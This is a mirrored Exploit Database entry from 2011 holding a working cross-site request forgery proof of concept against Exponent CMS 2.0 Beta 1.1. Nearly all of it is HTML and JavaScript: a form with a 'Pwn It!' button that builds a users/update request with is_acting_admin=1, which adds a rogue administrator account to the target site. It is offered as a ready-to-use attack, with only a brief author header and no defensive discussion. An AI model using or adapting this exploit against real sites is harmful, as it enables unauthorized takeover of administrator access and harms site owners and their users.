Exponent CMS 2.0 Beta 1.1 – Cross-Site Request Forgery (Add Administrator Account)

• Exploit Database
• 113 阅读

• 作者： outlaw.dll
  日期： 2011-05-02
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17235/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112

  <!-- [+] Title: Exponent CMS 2.0 Beta 1.1 CSRF Add Administrator Account PoC [+] Version: 2.0 Beta 1.1 (not tested with older versions) [+] Note: No need administrator to be logged (: [+] Tested on: Linux Ubuntu 11.04 (Google Chrome) but will work in any other OS [+] Download URL: https://github.com/downloads/exponentcms/exponent-cms/exponent-2.0.0-beta1.1.zip [+] Date: 02.05.2011 [+] Author: outlaw.dll   GreetZ to all bitcheZ in the world! =P W_o.O_W --> <html> <head> <title>Exponent CMS 2.0 Beta 1.1 CSRF Add Administrator Account PoC by outlaw.dll</title> <style type="text/css"> body, table, tr, td { background-color: #00489C; font-family: Verdana; font-size: 16px; color: #FFFFFF; } </style> </head> <body> <pre> .-""""-. .-""""-. /\ /\ /__\ /__\ // \/ \\ // \/ \\ |\__\/__/| |\__\/__/| \||/ \||/ \/ \/ \__/ \__/ .-""""-. &apos;.__.&apos;.-""""-. &apos;.__.&apos;.-""""-. /\ ||/\ ||/\ /__\|/__\|/__\ // \/ \\ // \/ \\ // \/ \\ |\__\/__/| |\__\/__/| |\__\/__/| \||/ \||/ \||/ \/ \/ \/ \__/ \__/ \__/ &apos;.__.&apos; &apos;.__.&apos; &apos;.__.&apos; || || || || || || </pre> Exponent CMS 2.0 Beta 1.1 CSRF Add Administrator Account PoC by outlaw.dll <br /><br /> <form name="exploit"> <table border="0"> <tr> <td width="150" align="right">Target URL:</td> <td width="400"><input type="text" name="targetURL" value="http://localhost/exponent/index.php" size="30" /></td> </tr> <tr> <td width="150" align="right">Username:</td> <td width="400"><input type="text" name="username" value="pwned" size="30" /></td> </tr> <tr> <td width="150" align="right">Password:</td> <td width="400"><input type="text" name="password" value="1337" size="30" /></td> </tr> <tr> <td width="150" align="right">E-M@il:</td> <td width="400"><input type="text" name="email" value="root@pwned.cx" size="30" /></td> </tr> <tr> <td width="150" align="right">First Name:</td> <td width="400"><input type="text" name="firstname" value="Greatest" size="30" /></td> </tr> <tr> <td width="150" align="right">Last Name:</td> <td width="400"><input type="text" name="lastname" value="Ever" size="30" /></td> </tr> <tr> <td width="150" align="right">Admin Permissions:</td> <td width="400"><input type="checkbox" name="isAdmin" checked="yes" value="1" /></td> </tr> <tr> <td width="150"></td> <td width="400"><input type="button" value="Pwn It!" onClick="runExploit()" /></td> </tr> </table> </form> <script type="text/javascript"> function runExploit() { var targetURL = exploit.targetURL.value; var username = exploit.username.value; var password = exploit.password.value; var email = exploit.email.value; var firstname = exploit.firstname.value; var lastname = exploit.lastname.value; var isAdmin = exploit.isAdmin.value;   if (targetURL != "" && username != "" && password != "" && email != "" && firstname != "" && lastname != "" && isAdmin != "") { var exploitURL = targetURL + "?module=users&action=update&username="+username+"&pass1="+password+"&pass2="+password+"&email="+email+"&firstname="+firstname+"&lastname="+lastname+"&is_acting_admin="+isAdmin; location.replace(exploitURL); } else { alert("Error! Empty form fields."); } } </script> </body> </html>